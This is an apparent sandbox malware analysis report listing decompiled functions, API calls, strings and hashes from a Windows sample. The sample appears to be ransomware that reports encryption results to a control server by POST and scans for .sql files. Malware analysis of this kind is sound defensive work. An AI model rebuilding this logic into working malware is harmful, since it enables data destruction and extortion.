RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0F4E7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F4E7426
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0F4E7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F4E7447
RegCloseKey.KERNEL32(?,?,0F4E7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F4E7457
GetLastError.KERNEL32(?,0F4E7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F4E7466
RegCloseKey.ADVAPI32(?,?,0F4E7885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F4E746F

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 74c85849ff6021a0684e137cebdfe7c96880142cbd14cd2f16f659808d9d6d99
Instruction ID: d105f0a126a704e4f24911bd16acbecda9a53c8537959de8337a9299222ccbd2
Opcode Fuzzy Hash: 74c85849ff6021a0684e137cebdfe7c96880142cbd14cd2f16f659808d9d6d99
Instruction Fuzzy Hash: 77012C7260011DFBCB10DF94ED09DEABF68EF08362B008162FD05DA111D7329A34ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E2830 Relevance: 4.5, APIs: 3, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0F4E2830(WCHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				void* _t3;
				int _t7;
				void* _t9;
				void* _t14;
				struct _OVERLAPPED* _t17;

				_push(__ecx);
				_t9 = __edx; // executed
				_t3 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_t14 = _t3;
				_t17 = 0;
				if(_t14 != 0xffffffff) {
					if(_t9 == 0) {
						L3:
						_t17 = 1;
					} else {
						_t7 = WriteFile(_t14, _t9, _a4,  &_v8, 0); // executed
						if(_t7 != 0) {
							goto L3;
						}
					}
					FindCloseChangeNotification(_t14); // executed
				}
				return _t17;
			}

0x0f4e2833
0x0f4e284a
0x0f4e284c
0x0f4e2852
0x0f4e2854
0x0f4e2859
0x0f4e285d
0x0f4e2873
0x0f4e2873
0x0f4e285f
0x0f4e2869
0x0f4e2871
0x00000000
0x00000000
0x0f4e2871
0x0f4e2879
0x0f4e2879
0x0f4e2887

APIs

CreateFileW.KERNEL32(0F4E2C02,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000000,0F4E2C02,?,0F4E293C,?), ref: 0F4E284C
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,0F4E293C,?,?,?,?,0F4E2C02), ref: 0F4E2869
FindCloseChangeNotification.KERNEL32(00000000,?,0F4E293C,?,?,?,?,0F4E2C02), ref: 0F4E2879

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID:
API String ID: 3805958096-0
Opcode ID: 9b34ec4f7b1d8e93fa3e68fe359d18dc4dfb69791ab14d2be46dc28e9a1c272c
Instruction ID: 88888a55f8a32861c33c436fd48cf2dd3bc949e5a9f4f59b29a7cf707776e407
Opcode Fuzzy Hash: 9b34ec4f7b1d8e93fa3e68fe359d18dc4dfb69791ab14d2be46dc28e9a1c272c
Instruction Fuzzy Hash: 97F0A77270021477E7304A96AC89FFBFA5CDB96B72F504326FE08E61C2D6A4AD1152A4

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E6550 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0F4E6550(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0F4E63E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x0f4e6553
0x0f4e6554
0x0f4e6565
0x0f4e656e
0x0f4e657f
0x0f4e6588
0x0f4e658d
0x0f4e6597
0x0f4e65b5
0x0f4e65b9
0x0f4e65c3
0x0f4e65c8
0x0f4e65c8
0x0f4e65d2
0x0f4e65df

APIs

VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0F4E4B9E), ref: 0F4E6565
VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0F4E4B9E), ref: 0F4E657F

Part of subcall function 0F4E63E0: CryptAcquireContextW.ADVAPI32(0F4E4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F4E4B96,?,0F4E4B9E), ref: 0F4E63F8
Part of subcall function 0F4E63E0: GetLastError.KERNEL32(?,0F4E4B9E), ref: 0F4E6402
Part of subcall function 0F4E63E0: CryptAcquireContextW.ADVAPI32(0F4E4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F4E4B9E), ref: 0F4E641E

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: 419c5a6657d1682df44644a961cbf127927b24f81bd721386db5f6114216fe5a
Instruction ID: aac556e42a73dcc04b44df9eafefc5892d34a759aa766b141d6791cce4124aeb
Opcode Fuzzy Hash: 419c5a6657d1682df44644a961cbf127927b24f81bd721386db5f6114216fe5a
Instruction Fuzzy Hash: 4F11DB74A40208EFE704CF84DA55F99BBF5EF88705F208188E904AB382D7B5EF109B54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0F4E53D0 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 230
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0F4E53D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				void** _v24;
				void* _v28;
				void* _v32;
				char _v36;
				void* _v84;
				CHAR* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v104;
				short _v128;
				void* __esi;
				int _t40;
				BYTE* _t41;
				int _t43;
				void* _t61;
				void* _t65;
				void* _t68;
				void* _t69;
				intOrPtr _t71;
				CHAR* _t80;
				char* _t82;
				CHAR* _t83;
				void* _t84;
				CHAR* _t88;
				int _t96;
				void* _t98;
				void* _t99;
				int _t100;
				void* _t101;
				long _t102;
				BYTE* _t103;
				CHAR* _t105;
				void* _t106;
				void* _t108;

				_t82 = __ecx;
				_v16 = __edx;
				_t40 = lstrlenA(__ecx) + 1;
				_v8 = _t40;
				_t3 = _t40 + 1; // 0x2
				_t102 = _t3;
				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
				_v20 = _t41;
				if(_t41 == 0 || _v8 >= _t102) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 = _t41;
				}
				_t98 = 0;
				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
				_t116 = _t43;
				if(_t43 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t96 = _v8;
					E0F4E5F00(_t103, _t96, _t103);
					asm("xorps xmm0, xmm0");
					_t88 =  &_v36;
					asm("movdqu [ebp-0x20], xmm0");
					E0F4E33E0(_t88, _t116, _t103);
					if(_v36 != 0) {
						E0F4E5350();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t82);
						_push(_t103);
						_t83 = _t88;
						_v96 = _t96;
						_push(0);
						_v88 = _t83;
						E0F4E7E40( &_v104);
						_v92 = E0F4E5220();
						_t99 = 0x400 + lstrlenA(_t83) * 2;
						_t22 = _t99 + 1; // 0x1
						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
						__eflags = _t84;
						if(_t84 == 0) {
							L20:
							_t105 = 0;
							__eflags = 0;
						} else {
							_t24 = _t99 + 1; // 0x1
							__eflags = _t99 - _t24;
							if(_t99 >= _t24) {
								goto L20;
							} else {
								_t105 = _t84;
							}
						}
						lstrcatA(_t105, _v16);
						asm("movdqu xmm0, [0xf4efb40]");
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [0xf4efb50]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [0xf4efb60]");
						asm("movdqu [ebp-0x58], xmm0");
						asm("movdqu xmm0, [0xf4efb70]");
						asm("movdqu [ebp-0x48], xmm0");
						asm("movdqu xmm0, [0xf4efb80]");
						asm("movdqu [ebp-0x38], xmm0");
						asm("movdqu xmm0, [0xf4efb90]");
						asm("movdqu [ebp-0x28], xmm0");
						lstrlenA(_t105);
						_t100 = 0;
						_push(lstrlenW( &_v128));
						_push( &_v128);
						_push(L"POST");
						_push(0x31fff);
						_push(_v12);
						_push(lstrlenA(_t105));
						_push(_t105);
						_t106 = _v20;
						_push(L"popkadurak");
						_push(_t106);
						_t61 = E0F4E8050( &_v32);
						__eflags = _t61;
						if(_t61 != 0) {
							__eflags = _a4;
							_t100 = 1;
							if(_a4 != 0) {
								_v16 = 0;
								_t68 = E0F4E53D0(_v12,  &_v16);
								__eflags = _t68;
								if(_t68 == 0) {
									_t100 = 0;
									__eflags = 0;
								} else {
									_t69 = _v16;
									__eflags = _t69;
									if(_t69 != 0) {
										 *_v24 = _t69;
									}
								}
							}
						}
						VirtualFree(_t106, 0, 0x8000);
						VirtualFree(_v12, 0, 0x8000);
						VirtualFree(_t84, 0, 0x8000);
						_t65 = _v28;
						__eflags = _t65;
						if(_t65 != 0) {
							InternetCloseHandle(_t65);
						}
						return _t100;
					} else {
						_t101 = _v32;
						_t71 =  *0xf4f2a60; // 0x0
						_t108 = _v28;
						_t72 =  !=  ? 0 : _t71;
						_v12 = 1;
						 *0xf4f2a60 =  !=  ? 0 : _t71;
						if(_t108 != 0) {
							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
							 *_v16 = _t80;
							if(_t80 != 0) {
								lstrcpyA(_t80, _t108);
							}
						}
						_t73 = GetProcessHeap;
						if(_t101 != 0) {
							HeapFree(GetProcessHeap(), 0, _t101);
							_t73 = GetProcessHeap;
						}
						if(_t108 != 0) {
							HeapFree( *_t73(), 0, _t108);
						}
						_t98 = _v12;
						L14:
						VirtualFree(_v20, 0, 0x8000);
						return _t98;
					}
				}
			}

0x0f4e53d9
0x0f4e53db
0x0f4e53e5
0x0f4e53ed
0x0f4e53f0
0x0f4e53f0
0x0f4e53f6
0x0f4e53fc
0x0f4e5401
0x0f4e540c
0x0f4e540c
0x0f4e5408
0x0f4e5408
0x0f4e5408
0x0f4e540e
0x0f4e541b
0x0f4e5421
0x0f4e5423
0x0f4e54dc
0x00000000
0x0f4e5429
0x0f4e5429
0x0f4e542e
0x0f4e5433
0x0f4e5436
0x0f4e543a
0x0f4e543f
0x0f4e5447
0x0f4e54e4
0x0f4e54e9
0x0f4e54ea
0x0f4e54eb
0x0f4e54ec
0x0f4e54ed
0x0f4e54ee
0x0f4e54ef
0x0f4e54f6
0x0f4e54f7
0x0f4e54f8
0x0f4e54fa
0x0f4e54fd
0x0f4e5501
0x0f4e5504
0x0f4e550f
0x0f4e5525
0x0f4e552c
0x0f4e5542
0x0f4e5546
0x0f4e5549
0x0f4e554b
0x0f4e5558
0x0f4e5558
0x0f4e5558
0x0f4e554d
0x0f4e554d
0x0f4e5550
0x0f4e5552
0x00000000
0x0f4e5554
0x0f4e5554
0x0f4e5554
0x0f4e5552
0x0f4e555e
0x0f4e5564
0x0f4e556d
0x0f4e5572
0x0f4e557a
0x0f4e557f
0x0f4e5587
0x0f4e558c
0x0f4e5594
0x0f4e5599
0x0f4e55a1
0x0f4e55a6
0x0f4e55ae
0x0f4e55b3
0x0f4e55bc
0x0f4e55c5
0x0f4e55c9
0x0f4e55ca
0x0f4e55d2
0x0f4e55d7
0x0f4e55e1
0x0f4e55e2
0x0f4e55e3
0x0f4e55e9
0x0f4e55ee
0x0f4e55ef
0x0f4e55f4
0x0f4e55f6
0x0f4e55f8
0x0f4e55fc
0x0f4e5601
0x0f4e5609
0x0f4e5610
0x0f4e5615
0x0f4e5617
0x0f4e5627
0x0f4e5627
0x0f4e5619
0x0f4e5619
0x0f4e561c
0x0f4e561e
0x0f4e5623
0x0f4e5623
0x0f4e561e
0x0f4e5617
0x0f4e5601
0x0f4e5637
0x0f4e5643
0x0f4e564d
0x0f4e564f
0x0f4e5652
0x0f4e5654
0x0f4e5657
0x0f4e5657
0x0f4e5665
0x0f4e544d
0x0f4e544d
0x0f4e5452
0x0f4e5459
0x0f4e545c
0x0f4e545f
0x0f4e5466
0x0f4e546d
0x0f4e5481
0x0f4e548a
0x0f4e548e
0x0f4e5492
0x0f4e5492
0x0f4e548e
0x0f4e549e
0x0f4e54a5
0x0f4e54ad
0x0f4e54af
0x0f4e54af
0x0f4e54b6
0x0f4e54be
0x0f4e54be
0x0f4e54c0
0x0f4e54c3
0x0f4e54cd
0x0f4e54db
0x0f4e54db
0x0f4e5447

APIs

lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0F4E5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E53DF
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0F4E5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E53F6
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F4E541B
lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0F4E5615,00000000,popkadurak), ref: 0F4E5477
VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0F4E5615,00000000,popkadurak), ref: 0F4E5481
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0F4E5615,00000000,popkadurak), ref: 0F4E5492
HeapFree.KERNEL32(00000000,?,?,?,?,0F4E5615,00000000,popkadurak), ref: 0F4E54AD
HeapFree.KERNEL32(00000000,?,?,?,?,0F4E5615,00000000,popkadurak), ref: 0F4E54BE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F4E5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E54CD
GetLastError.KERNEL32(?,?,?,?,0F4E5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E54DC
lstrlenA.KERNEL32(00000000,00000000,00000000,74716980), ref: 0F4E5512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F4E5532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F4E5544
lstrcatA.KERNEL32(00000000,?), ref: 0F4E555E
lstrlenA.KERNEL32(00000000), ref: 0F4E55B3
lstrlenW.KERNEL32(?), ref: 0F4E55BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F4E55DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E5637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F4E5643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F4E564D
InternetCloseHandle.WININET(0F4E581B), ref: 0F4E5657

Strings

POST, xrefs: 0F4E55CA
popkadurak, xrefs: 0F4E55E9

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
String ID: POST$popkadurak
API String ID: 1287001821-2707760125
Opcode ID: de549e51eb5c460ce3bc50a6477ec7794cc1f8bc01b027bda27a9d1de99d05cd
Instruction ID: 46994d82bfd4f9c3ccc6baa462a2e385701b2c126fbac1f265f3a4fa7ddb64b0
Opcode Fuzzy Hash: de549e51eb5c460ce3bc50a6477ec7794cc1f8bc01b027bda27a9d1de99d05cd
Instruction Fuzzy Hash: F5719271E00309ABEB109BA59C45FEEBF79EF88716F144116EE04EA242DB789A54CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E5670 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0F4E5670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				char _v164;
				void* __esi;
				BYTE* _t33;
				int _t41;
				CHAR* _t44;
				int _t52;
				void* _t53;
				char _t60;
				BYTE* _t65;
				char* _t69;
				signed int _t70;
				void* _t75;
				signed int _t78;
				CHAR* _t85;
				int _t87;
				long _t88;
				void* _t89;
				void* _t91;
				void* _t94;

				_t82 = __edx;
				_t70 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v20 = _t33;
				if(_t33 == 0) {
					_t65 = 0;
					_t85 = 0;
				} else {
					_t4 =  &(_t33[0x800]); // 0x800
					_t85 = _t4;
					_t65 = _t33;
				}
				_push(_v12);
				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
				_push(0);
				_push(_t70);
				_push(0);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_t94 = _t91 + 0x14;
				_push(0);
				_push(_t70);
				_push(0);
				E0F4E3BC0( &_v164);
				E0F4E7490( &_v164, _t82);
				E0F4E72A0( &_v164);
				E0F4E70A0( &_v164, _t65 + lstrlenW(_t65) * 2);
				_t41 = lstrlenW(_t65);
				_t75 =  *0xf4f2a78; // 0x0
				_v8 = _t41;
				if(_t75 != 0) {
					VirtualFree(_t75, 0, 0x8000);
				}
				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
				 *0xf4f2a78 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44, "%S", L"popkadurak");
					_t94 = _t94 + 0xc;
				}
				_t87 = _v8 + _v8;
				E0F4E5F00(_t65, _t87, _t87);
				_v16 = _v8 * 8;
				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
					GetLastError();
				}
				_t22 = lstrlenA(_t85) + 4; // 0x4
				_t88 = _t22;
				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
				_t52 = lstrlenA(_t85);
				_t78 = _v12;
				_t53 = _t52 + 2;
				if(_t78 == 0) {
					L11:
					_v8 = 0;
				} else {
					_v8 = _t78;
					if(_t53 >= _t88) {
						goto L11;
					}
				}
				_t89 = 0;
				if(lstrlenA(_t85) != 0) {
					_t69 = _v8;
					do {
						_t60 =  *((intOrPtr*)(_t89 + _t85));
						if(_t60 != 0xa && _t60 != 0xd) {
							 *_t69 = _t60;
							_t69 = _t69 + 1;
						}
						_t89 = _t89 + 1;
					} while (_t89 < lstrlenA(_t85));
				}
				E0F4E54F0(_v8, 0, _t78, 0);
				_t68 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0F4E7D70( &_v164);
				VirtualFree(_v20, 0, 0x8000);
				_t59 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x0f4e5670
0x0f4e5670
0x0f4e5690
0x0f4e5693
0x0f4e5696
0x0f4e5698
0x0f4e569d
0x0f4e56a9
0x0f4e56ab
0x0f4e569f
0x0f4e569f
0x0f4e569f
0x0f4e56a5
0x0f4e56a5
0x0f4e56ad
0x0f4e56bf
0x0f4e56c8
0x0f4e56ca
0x0f4e56cb
0x0f4e56d0
0x0f4e56d2
0x0f4e56d3
0x0f4e56d5
0x0f4e56d6
0x0f4e56d8
0x0f4e56d9
0x0f4e56db
0x0f4e56dc
0x0f4e56de
0x0f4e56e1
0x0f4e56e3
0x0f4e56e4
0x0f4e56ec
0x0f4e56f7
0x0f4e5702
0x0f4e5718
0x0f4e571e
0x0f4e5724
0x0f4e572a
0x0f4e572f
0x0f4e5739
0x0f4e5739
0x0f4e5757
0x0f4e5759
0x0f4e5760
0x0f4e576d
0x0f4e5773
0x0f4e5773
0x0f4e577b
0x0f4e5780
0x0f4e578f
0x0f4e57a6
0x0f4e57a8
0x0f4e57a8
0x0f4e57be
0x0f4e57be
0x0f4e57cb
0x0f4e57ce
0x0f4e57d0
0x0f4e57d3
0x0f4e57d8
0x0f4e57e1
0x0f4e57e1
0x0f4e57da
0x0f4e57da
0x0f4e57df
0x00000000
0x00000000
0x0f4e57df
0x0f4e57e9
0x0f4e57ef
0x0f4e57f1
0x0f4e57f4
0x0f4e57f4
0x0f4e57f9
0x0f4e57ff
0x0f4e5801
0x0f4e5801
0x0f4e5803
0x0f4e580a
0x0f4e57f4
0x0f4e5816
0x0f4e5830
0x0f4e583d
0x0f4e5845
0x0f4e5854
0x0f4e5858
0x0f4e585e

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F4E5696
wsprintfW.USER32 ref: 0F4E56BF
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F4E5708
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F4E571E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F4E5739
lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0F4E574B
VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0F4E5757
wsprintfA.USER32 ref: 0F4E576D
CryptBinaryToStringA.CRYPT32(00000000,747166A0,40000001,00000000,?), ref: 0F4E579E
GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0F4E57A8
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F4E57B5
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0F4E57C4
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F4E57CE
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F4E57EB
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F4E5804
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F4E583D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F4E5854

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0F4E56B9
popkadurak, xrefs: 0F4E5746, 0F4E5762

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
API String ID: 823394411-2102589890
Opcode ID: 89aa5e326b91fbdf5570b37861ffad5387bdff6845cafdd1634b832e77dbe06c
Instruction ID: 3977311e4d6d30c7b4c9eeb19773294d1c6a9dbc5e5d8f9abf82825aebb6bb25
Opcode Fuzzy Hash: 89aa5e326b91fbdf5570b37861ffad5387bdff6845cafdd1634b832e77dbe06c
Instruction Fuzzy Hash: 9651A770A40304BFEB24DF64DC46FAE7B79EF44716F540059FE05EA182DAB4AA24CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E6BA0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E6BA0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F4E8260(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0F4E6B40(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

0x0f4e6bab
0x0f4e6baf
0x0f4e6bbe
0x0f4e6bc1
0x0f4e6bc4
0x0f4e6bde
0x0f4e6be3
0x0f4e6be6
0x0f4e6bf0
0x0f4e6c00
0x00000000
0x0f4e6c1c
0x0f4e6c24
0x0f4e6c2b
0x0f4e6c31
0x0f4e6c34
0x0f4e6c39
